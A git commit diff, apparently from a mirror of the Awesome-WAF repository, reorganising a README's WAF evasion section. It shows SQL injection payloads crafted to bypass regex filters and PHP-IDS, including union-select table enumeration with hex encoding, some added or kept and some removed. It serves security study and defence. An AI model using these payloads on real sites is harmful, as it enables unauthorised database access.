mirror of
https://github.com/0xInfection/Awesome-WAF.git
synced 2024-12-25 15:39:21 -05:00
Update README.md
This commit is contained in:
parent
72469e0cb0
commit
f9a21ed5ba
30
README.md
30
README.md
@ -1337,10 +1337,10 @@ Wanna detect WAFs? Lets see how.
|
|||||||
</tr>
|
</tr>
|
||||||
</table>
|
</table>
|
||||||
|
|
||||||
## Evasion Techniques
|
# Evasion Techniques
|
||||||
Lets look at some methods of bypassing and evading WAFs.
|
Lets look at some methods of bypassing and evading WAFs.
|
||||||
|
|
||||||
### Fuzzing/Bruteforcing:
|
## Fuzzing/Bruteforcing:
|
||||||
#### Method:
|
#### Method:
|
||||||
Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:
|
Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:
|
||||||
- Wordlists specifically for fuzzing - [Seclists Fuzzing](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing).
|
- Wordlists specifically for fuzzing - [Seclists Fuzzing](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing).
|
||||||
@ -1358,14 +1358,16 @@ __Drawback:__
|
|||||||
- This method often fails.
|
- This method often fails.
|
||||||
- Many a times your IP will be blocked (temporarily/permanently).
|
- Many a times your IP will be blocked (temporarily/permanently).
|
||||||
|
|
||||||
### Regex-Reversing:
|
## Regex-Reversing:
|
||||||
#### Method:
|
### Method:
|
||||||
- Most efficient method of bypassing WAFs.
|
- Most efficient method of bypassing WAFs.
|
||||||
- Some WAFs rely upon matching the attack payloads with the signatures in their databases.
|
- Some WAFs rely upon matching the attack payloads with the signatures in their databases.
|
||||||
- Payload matches the reg-ex the WAF triggers alarm.
|
- Payload matches the reg-ex the WAF triggers alarm.
|
||||||
|
|
||||||
#### Techniques:
|
#### Techniques:
|
||||||
|
|
||||||
|
__Scenario 1: SQL Injection__
|
||||||
|
|
||||||
##### • Step 1:
|
##### • Step 1:
|
||||||
__Keyword filer__: `and`, `or`, `union`
|
__Keyword filer__: `and`, `or`, `union`
|
||||||
__Possible PHP Filter Code__: `preg_match('/(and|or|union)/i', $id)`
|
__Possible PHP Filter Code__: `preg_match('/(and|or|union)/i', $id)`
|
||||||
@ -1423,24 +1425,6 @@ __Possible PHP Filter Code__: `preg_match('/(and|or|union|where|limit|group b
|
|||||||
- __Filtered Injection__: `1 || lpad(user,7,1)`
|
- __Filtered Injection__: `1 || lpad(user,7,1)`
|
||||||
- __Bypassed Injection__: `1%0b||%0blpad(user,7,1)`
|
- __Bypassed Injection__: `1%0b||%0blpad(user,7,1)`
|
||||||
|
|
||||||
---
|
|
||||||
|
|
||||||
__PHP-IDS__ generally blocks input containing `=` or `(` or `'` following with any a string or integer e.g. `1 or 1=1`, `1 or '1'`, `1 or char(97)`. However, it can be bypassed using a statement that does not contain `=`, `(` or `'` symbols.
|
|
||||||
|
|
||||||
#### Scenario 1:
|
|
||||||
- __Filtered Injection__: `1 or 1 = 1`
|
|
||||||
- __Bypassed Injection__: `1 or 1`
|
|
||||||
|
|
||||||
#### Scenario 2:
|
|
||||||
- __Filtered injection__: `1 union select 1, table_name from information_schema.tables where table_name = 'users'`
|
|
||||||
- __Filtered Injection__: `1 union select 1, table_name from information_schema.tables where table_name between 'a' and 'z'`
|
|
||||||
- __Filtered Injection__: `1 union select 1, table_name from information_schema.tables where table_name between char(97) and char(122)`
|
|
||||||
- __Bypassed Injection__: `1 union select 1, table_name from information_schema.tables where table_name between 0x61 and 0x7a`
|
|
||||||
- __Bypassed Injection__: `1 union select 1, table_name from information_schema.tables where table_name like 0x7573657273`
|
|
||||||
|
|
||||||
__Drawbacks:__
|
|
||||||
- This method is time consuming.
|
|
||||||
|
|
||||||
## Google Dorks Approach:
|
## Google Dorks Approach:
|
||||||
|
|
||||||
## Known Bypasses:
|
## Known Bypasses:
|
||||||
@ -1649,4 +1633,4 @@ whatwaf -u <target> --ra --throttle 2
|
|||||||
- [Protocol Level WAF Evasion Techniques](presentations/BlackHat%20US%2012%20-%20Protocol%20Level%20WAF%20Evasion%20(Slides).pdf) - A presentation at about efficiently evading WAFs at protocol level from [BlackHat US 12](https://www.blackhat.com/html/bh-us-12/).
|
- [Protocol Level WAF Evasion Techniques](presentations/BlackHat%20US%2012%20-%20Protocol%20Level%20WAF%20Evasion%20(Slides).pdf) - A presentation at about efficiently evading WAFs at protocol level from [BlackHat US 12](https://www.blackhat.com/html/bh-us-12/).
|
||||||
- [Analysing Attacking Detection Logic Mechanisms](presentations/BlackHat%20US%2016%20-%20Analysis%20of%20Attack%20Detection%20Logic.pdf) - A presentation about WAF logic applied to detecting attacks from [BlackHat US 16](https://www.blackhat.com/html/bh-us-16/).
|
- [Analysing Attacking Detection Logic Mechanisms](presentations/BlackHat%20US%2016%20-%20Analysis%20of%20Attack%20Detection%20Logic.pdf) - A presentation about WAF logic applied to detecting attacks from [BlackHat US 16](https://www.blackhat.com/html/bh-us-16/).
|
||||||
- [WAF Bypasses and PHP Exploits](presentations/WAF%20Bypasses%20and%20PHP%20Exploits%20(Slides).pdf) - A presentation about evading WAFs and developing related PHP exploits.
|
- [WAF Bypasses and PHP Exploits](presentations/WAF%20Bypasses%20and%20PHP%20Exploits%20(Slides).pdf) - A presentation about evading WAFs and developing related PHP exploits.
|
||||||
- [Playing Around with WAFs](presentations/Playing%20Around%20with%20WAFs.pdf) - A small presentation about WAF profiling and playing around with them from [Defcon 16](http://www.defcon.org/html/defcon-16/dc-16-post.html).
|
- [Playing Around with WAFs](presentations/Playing%20Around%20with%20WAFs.pdf) - A small presentation about WAF profiling and playing around with them from [Defcon 16](http://www.defcon.org/html/defcon-16/dc-16-post.html).
|
||||||
|
Loading…
Reference in New Issue
Block a user